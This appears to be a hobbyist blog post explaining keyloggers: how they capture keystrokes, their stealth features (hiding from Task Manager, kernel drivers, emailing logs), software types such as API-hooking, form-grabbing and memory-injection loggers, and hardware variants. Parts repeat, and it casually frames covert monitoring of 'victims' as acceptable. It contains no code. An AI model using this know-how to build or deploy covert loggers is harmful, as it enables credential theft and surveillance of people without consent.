Key-Logger ! Hope you heard of it. If not then just go down this article.
So, What is Key-Logger?
Key-Logger = Keys + Log. Such a thing which keeps the log of keys pressed from the keyboard.
It is software/hardware that do keystroke logging. Keystroke logging is the action of tracking/logging all keys strokes pressed from keyboard without the knowledge of user. Means user is not aware of that his data like credit card number and password is being traced by the hacker.
Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke. When ever you press a key on keyboard, keyboard interface tells processor that a key is pressed and it needs to be displayed on a screen/monitor. So processor puts key and give command to display on screen. But in the meantime only these Key-loggers do their work, as soon as key is displayed on the screen they record it. And this Key-logger program it runs in the background and record all records. It remain untraceable even by firewall and anti-viruses. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. Now these hidden logged keystrokes can be send to the user's Mail ID or copied to the specific path depending upon the settings and software. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a Key-logger will reveal the contents of all e-mail composed by the user. Sometimes if you are able to track them also, you can't uninstall them. Then only choice you are left with is to format the system. These are very very powerful tools.
Uses:
Key-logger Must Have:
A Key-logger must have an .exe and .dll file. A .dll which does all the work and an .exe which loads the .dll and sets the hook, like record them or send them to user and all. So these both files .dll and .exe must be on the same directory mainly on C. A Key-loggers might be as simple as an exe and a dll that are placed on a machine and they are invoked at the time of boot just like entries of OS registery are invoked.
A Key-loggers could be which boasts these features:
If You are having any query, then mail me or comment here!
Keep Enjoying!
So, What is Key-Logger?
Key-Logger = Keys + Log. Such a thing which keeps the log of keys pressed from the keyboard.
Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke. When ever you press a key on keyboard, keyboard interface tells processor that a key is pressed and it needs to be displayed on a screen/monitor. So processor puts key and give command to display on screen. But in the meantime only these Key-loggers do their work, as soon as key is displayed on the screen they record it. And this Key-logger program it runs in the background and record all records. It remain untraceable even by firewall and anti-viruses. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. Now these hidden logged keystrokes can be send to the user's Mail ID or copied to the specific path depending upon the settings and software. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a Key-logger will reveal the contents of all e-mail composed by the user. Sometimes if you are able to track them also, you can't uninstall them. Then only choice you are left with is to format the system. These are very very powerful tools.
Uses:
- Key-loggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only.
- With the help of Key-loggers you can monitor your computer as you can view the log of keys pressed in your absence or what someone is doing on your computer.
- On the other side you can call it a hacking device. hacker can install in the targets computer to get his/her private data like credit card info and other passwords and all.
- Key-loggers can also be used by a family (or business) to monitor the network usage of people without their direct knowledge.
Advanced Key-loggers:
In previous days Key-loggers are only able to record the keys pressed by the victim. But now you can record videos of what your victim is doing on his computer, even you can get live telecast of it if user is connected to Internet. They can take the snapshots of screen they used to help us mainly in web field, like which sites victim is visiting. They can send you the pressed keys and snapped shots to your mail from victims system, provided he is connected to Internet.
Key-logger Must Have:
A Key-logger must have an .exe and .dll file. A .dll which does all the work and an .exe which loads the .dll and sets the hook, like record them or send them to user and all. So these both files .dll and .exe must be on the same directory mainly on C. A Key-loggers might be as simple as an exe and a dll that are placed on a machine and they are invoked at the time of boot just like entries of OS registery are invoked.
A Key-loggers could be which boasts these features:
- Stealth: invisible in process list/Task Manager.
- Includes kernel Key-logger driver that captures keystrokes even when user is logged off (To trace Log In passwords).
- ProBot program files(Used for invoking key-logger at time of booting) and registry entries are hidden.
- Includes Remote Deployment wizard(insatlling and unistalling remotely).
- Active window titles and process names logging.
- Keystroke / password logging.
- Regional keyboard support.
- Launched applications list.
- Text snapshots of active applications.
- Visited Internet URL logger.
- Capture HTTP POST data (including logins/passwords)
- File and Folder creation/removal logging.
- Log file archiving, separate log files for each user.(as on same system many users can work mainly in organisation)
- Log file secure encryption.(so only specified person can read them and save them from being open for all)
- Password authentication.
- Invisible operation
- Native GUI session log presentation
- HTML and Text log file export
- Automatic E-mail log file delivery
- Easy setup & uninstall wizards
- Support for Windows all versions.
Types:
- Software Based: These are the programs/applications which can be installed in the victims system to get log of his keys.
- Hardware Based: It is a small device which is placed between keyboard and CPU interface. It normally have USB connector. And connects at the end of keyboard wire to CPU. In laptops it can be directly inserted like a USB.
Software-based key-loggers:
These are software programs designed to work on the target computer’s operating system. From a technical perspective there are five categories:
- Hypervisor-based: The keylogger can theoretically reside in a malware running underneath the operating system, which remains untouched. You can think like a virtual machine as they resides beneath the OS. Blue Pill is a conceptual example.
- Kernel-based: This method is difficult both to write and to combat. Such keyloggers reside at the kernel level. So these are most difficult to detect. They can implemented as rootkits that harm the operating system kernel and gain unauthorized access to the hardware, making them very powerful. A keylogger using this method can act as a keyboard device driver for example, and thus gain access to any information typed on the keyboard as it goes to the operating system.
- API-based: These keyloggers hook keyboard APIs; the operating system then notifies the keylogger each time a key is pressed and the keylogger simply records it. Windows APIs such as
GetAsyncKeyState(),GetForegroundWindow(), etc. are used to poll the state of the keyboard or to subscribe to keyboard events. These types of keyloggers are the easiest to write, but where constant polling of each key is required, they can cause a noticeable increase in CPU usage, and can also miss the occasional key. - Form grabbing based: Form grabbing-based keyloggers log web form submissions by recording the web browsing onsubmit event functions. This records form data before it is passed over the Internet and bypasses HTTPS encryption.
- Memory injection based: Memory Injection -based keyloggers alter memory tables associated with the browser and other system functions to perform their logging functions. By patching the memory tables or injecting directly into memory, this technique can be used by malware authors who are looking to bypass Windows UAC (User Account Control). The Zeus and Spyeye Trojans use this method exclusively.
- Packet analyzers: This involves capturing network traffic associated with HTTP POST events to retrieve unencrypted passwords.
- Remote access software keyloggers: These are local software keyloggers with an added feature that allows access to the locally recorded data from a remote location. Remote communication may be achieved using one of these methods:
- Data is uploaded to a website, database or an FTP server.
- Data is periodically emailed to a pre-defined email address.
- Data is wirelessly transmitted by means of an attached hardware system.
Related features
Hardware-based keyloggers
Software Key-loggers may be augmented with features that capture user information without relying on keyboard key presses as the sole input. Some of these features include:
- Clipboard logging. Anything that has been copied to the clipboard can be captured by the program.
- Screen logging. Screenshots are taken in order to capture graphics-based information. Applications with screen logging abilities may take screenshots of the whole screen. They may take these screenshots periodically or in response to user behaviours (for example, when a user has clicked the mouse).
- The Microsoft Windows API allows programs to request the text 'value' in some controls. This means that some passwords may be captured, even if they are hidden behind password masks.
Main article: Hardware keylogger
Hardware-based keyloggers do not depend upon any software being installed as they exist at a hardware level in a computer system.
- Firmware-based: BIOS-level firmware that handles keyboard events can be modified to record these events as they are processed. Physical and/or root-level access is required to the machine, and the software loaded into the BIOS needs to be created for the specific hardware that it will be running on.
- Keyboard hardware: Hardware keyloggers are used for keystroke logging by means of a hardware circuit that is attached somewhere in between the computer keyboard and the computer, typically inline with the keyboard's cable connector. More stealthy implementations can be installed or built into standard keyboards, so that no device is visible on the external cable. Both types log all keyboard activity to their internal memory, which can be subsequently accessed, for example, by typing in a secret key sequence. A hardware keylogger has an advantage over a software solution: it is not dependent on being installed on the target computer's operating system and therefore will not interfere with any program running on the target machine or be detected by any software.
- Wireless keyboard sniffers: These passive sniffers collect packets of data being transferred from a wireless keyboard and its receiver. As encryption may be used to secure the wireless communications between the two devices, this may need to be cracked beforehand if the transmissions are to be read.
- Keyboard overlays: Criminals have been known to use keyboard overlays on ATMs to capture people's PINs. Each keypress is registered by the keyboard of the ATM as well as the criminal's keypad that is placed over it. The device is designed to look like an integrated part of the machine so that bank customers are unaware of its presence.
- Acoustic keyloggers: Acoustic cryptanalysis can be used to monitor the sound created by someone typing on a computer. Each key on the keyboard makes a subtly different acoustic signature when struck. It is then possible to identify which keystroke signature relates to which keyboard character via statistical methods such as frequency analysis.
- Electromagnetic emissions: It is possible to capture the electromagnetic emissions of a wired keyboard from up to 20 metres (66 ft) away, without being physically wired to it. In 2009, Swiss researches tested 11 different USB, PS/2 and laptop keyboards in a semi-anechoic chamber and found them all vulnerable, primarily because of the prohibitive cost of adding shielding during manufacture.The researchers used a wide-band receiver to tune into the specific frequency of the emissions radiated from the keyboards.
- Optical surveillance: Optical surveillance, while not a keylogger in the classical sense, is nonetheless an approach that can be used to capture passwords or PINs. A strategically placed camera, such as a hidden surveillance camera at an ATM, can allow a criminal to watch a PIN or password being entered.
- Physical evidence: For a keypad that is used only to enter a security code, the keys which are in actual use will have evidence of use from many fingerprints.
Keep Enjoying!
0 comments: